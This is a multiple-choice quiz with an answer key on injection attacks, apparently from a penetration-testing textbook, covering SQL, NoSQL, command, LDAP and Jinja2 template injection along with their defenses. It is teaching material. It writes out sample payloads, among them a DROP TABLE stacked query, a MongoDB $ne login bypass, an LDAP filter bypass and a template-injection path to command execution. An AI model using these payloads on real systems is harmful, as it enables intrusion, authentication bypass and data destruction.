Chapter 19 Quiz: Injection Attacks
Question 1
What is the root cause of all injection vulnerabilities?
A) Weak encryption algorithms B) The application fails to maintain a boundary between data and code when interacting with an interpreter C) Insufficient logging and monitoring D) Missing authentication on API endpoints
Answer: B) All injection vulnerabilities arise because user-supplied data is treated as part of the interpreter's command language, rather than being kept separate as data.
Question 2
In a UNION-based SQL injection attack, what must be true about the UNION query?
A) It must use the same table as the original query B) It must have the same number of columns as the original query C) It must use the same WHERE clause D) It must return only one row
Answer: B) The UNION query must have the same number of columns as the original query, and the data types must be compatible. This is why column count enumeration (via ORDER BY) is the first step.
Question 3
A tester sends ' AND 1=1-- - and gets normal results, then sends ' AND 1=2-- - and gets empty results. What type of injection is possible?
A) Error-based SQL injection B) UNION-based SQL injection C) Boolean-based blind SQL injection D) Time-based blind SQL injection
Answer: C) Boolean-based blind SQL injection. The application returns different responses for true (1=1) vs false (1=2) conditions, allowing data extraction through true/false questions.
Question 4
Which technique is used when a web application returns identical responses regardless of query truth value, and no error messages are visible?
A) UNION-based injection B) Error-based injection C) Time-based blind injection D) Out-of-band injection
Answer: C) Time-based blind injection uses database sleep functions (e.g., SLEEP(5), pg_sleep(5)) to cause measurable time delays that indicate whether a condition is true or false.
Question 5
In MongoDB, what does the $ne operator do when injected into a login query?
A) It encrypts the password B) It matches any value not equal to the specified value C) It deletes the user record D) It creates a new database
Answer: B) The $ne` (not equal) operator matches any value not equal to the specified value. When injected as `{"password": {"$ne": ""}}, it matches any non-empty password, bypassing authentication.
Question 6
What is the most secure way to prevent command injection when the application must execute system commands?
A) Use input validation with a denylisting approach
B) Use execFile with arguments as an array and shell=False
C) Escape shell metacharacters in user input
D) Run the command as a low-privilege user
Answer: B) Using execFile (or subprocess.run with shell=False) passes arguments directly to the executable without invoking a shell, making shell metacharacters harmless. This is the most reliable defense.
Question 7
What is second-order SQL injection?
A) Injection that requires two separate SQL queries to execute B) Injection where malicious input is stored safely but later used unsafely in a different query C) Injection that targets the second database in a cluster D) Injection that requires two user accounts to exploit
Answer: B) Second-order injection occurs when input is stored safely (using parameterized queries) but is later retrieved and used in a different query via string concatenation, triggering the injection in a separate code path.
Question 8
Which sqlmap option specifies the level of testing thoroughness?
A) --risk
B) --level
C) --technique
D) --verbose
Answer: B) --level (1-5) controls how many parameters, headers, and cookies are tested, and how many payloads are tried. --risk (1-3) controls whether potentially destructive payloads are used.
Question 9
What does the information_schema database contain in SQL databases?
A) Application business data B) User passwords in plaintext C) Metadata about databases, tables, columns, and other database objects D) Backup copies of deleted data
Answer: C) information_schema is a system database that contains metadata about all databases, tables, columns, data types, and privileges. It is the primary target for UNION-based SQL injection data extraction.
Question 10
A tester discovers a Jinja2 template injection. The payload {{7*7}} returns 49. What is the next step to escalate to remote code execution?
A) Inject {{system('id')}}
B) Navigate the Python class hierarchy via __class__.__mro__ to access os or subprocess modules
C) Inject {{exec('import os; os.system("id")')}}
D) Use {{eval('1+1')}}
Answer: B) Jinja2 sandboxing prevents direct calls to system() or eval(). The attacker must traverse the Python class hierarchy (e.g., ''.__class__.__mro__[1].__subclasses__()) to find classes like subprocess.Popen that provide command execution.
Question 11
Why does stacked query injection ('; DROP TABLE users; --) not work against all databases?
A) Not all databases support the DROP TABLE command B) Not all database drivers allow multiple SQL statements in a single query C) The semicolon is not a valid SQL separator D) DROP TABLE requires admin privileges in all databases
Answer: B) Whether stacked queries work depends on the database driver configuration. For example, MySQL's default mysql_query() function does not support stacked queries, while mysqli_multi_query() does. PostgreSQL and MSSQL generally support them.
Question 12
What defense does mongo-sanitize middleware provide against NoSQL injection?
A) It encrypts all MongoDB queries
B) It removes $ operators and dot notation from user-supplied objects
C) It converts MongoDB queries to SQL
D) It adds authentication to all MongoDB connections
Answer: B) mongo-sanitize strips keys that start with $` or contain `.` from user input, preventing operator injection attacks like `{"$ne": ""} or {"$gt": ""}.
Question 13
During a penetration test, you discover that submitting a single quote in a search field causes an HTTP 500 Internal Server Error. What should you conclude?
A) The application is definitely vulnerable to SQL injection B) User input may be reaching a SQL interpreter without proper handling, warranting further investigation C) The web server is misconfigured D) The application has a bug unrelated to security
Answer: B) A 500 error on a single quote is a strong indicator that input reaches a SQL interpreter without proper sanitization, but it is not confirmation of exploitable injection. Further testing is needed to determine exploitability.
Question 14
What is the purpose of sqlmap's --tamper scripts?
A) To modify sqlmap's output format B) To transform payloads to bypass WAFs and input filters C) To encrypt the connection between sqlmap and the target D) To tamper with the target database records
Answer: B) Tamper scripts modify sqlmap's payloads before they are sent. For example, space2comment replaces spaces with inline comments (/**/), and randomcase randomizes keyword casing to bypass signature-based WAFs.
Question 15
Which LDAP injection payload could bypass an authentication filter of the form (&(uid=$username)(userPassword=$password))?
A) admin' OR '1'='1
B) admin)(&)
C) admin; DROP TABLE users
D) admin<script>alert(1)</script>
Answer: B) The payload admin)(&) closes the uid parameter, inserts a filter that always evaluates to true (&), and causes the LDAP server to process the first complete filter, ignoring the password check.
Question 16
What is the key difference between injection and XSS attacks?
A) Injection targets the server-side interpreter; XSS targets the client-side browser B) Injection requires authentication; XSS does not C) Injection uses SQL; XSS uses HTTP D) There is no difference; they are the same vulnerability type
Answer: A) Injection attacks target server-side interpreters (SQL database, OS shell, LDAP server) to compromise the server and its data. XSS targets the client-side browser to compromise other users. This is the fundamental distinction between Chapters 19 and 20.
Question 17
In a penetration testing report, how should SQL injection be rated if it allows extraction of the entire user database including password hashes?
A) Low severity (informational) B) Medium severity C) High severity D) Critical severity
Answer: D) Critical severity. SQL injection that enables full database extraction represents complete compromise of data confidentiality. Combined with the potential for command execution (via xp_cmdshell, COPY TO PROGRAM, etc.), it typically warrants the highest severity rating (CVSS 9.0+).